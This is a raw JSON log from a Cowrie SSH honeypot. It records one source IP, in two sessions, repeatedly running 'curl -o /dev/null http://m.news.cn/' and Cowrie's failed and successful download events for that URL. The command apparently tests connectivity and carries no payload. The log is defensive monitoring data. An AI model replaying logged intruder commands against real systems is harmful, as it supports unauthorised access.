{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.335815Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.357329Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.381806Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.383207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.387458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.388441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.406032Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.408927Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.423180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.424670Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.431595Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.432657Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.446438Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.448001Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.465249Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.466574Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.473752Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.475187Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.495909Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.508708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.510432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.516704Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.520965Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.522321Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.531965Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.555846Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.557455Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.559728Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.562324Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.571101Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.572340Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.597419Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.609301Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.610588Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.617250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.618512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.633126Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.657680Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.658992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.665938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.666985Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.675413Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.676845Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.706159Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.707657Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.711870Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.713521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.714646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.750851Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.751750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.796931Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.799722Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.825399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.826902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.832427Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.833382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.841238Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.848528Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.867367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.868596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.874856Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.876232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.886755Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.888956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.903917Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.905276Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.914210Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.915402Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.927535Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.930128Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.940942Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.942383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.954376Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.955599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.974959Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.976275Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.988993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.990770Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.000232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.001400Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.026144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.027515Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.053401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.054702Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.060436Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.061939Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.094423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.095751Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.102770Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.105224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.106424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.109594Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.133288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.134599Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.138591Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.150544Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.151606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.155481Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.174137Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.175245Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.177018Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.191468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.192796Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.213333Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.215562Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.219509Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.221235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.235039Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.253807Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.257035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.257948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.273352Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.281713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.282979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.291224Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.291904Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.309790Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.328100Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.348258Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.365298Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.389043Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.391190Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.429527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.430977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
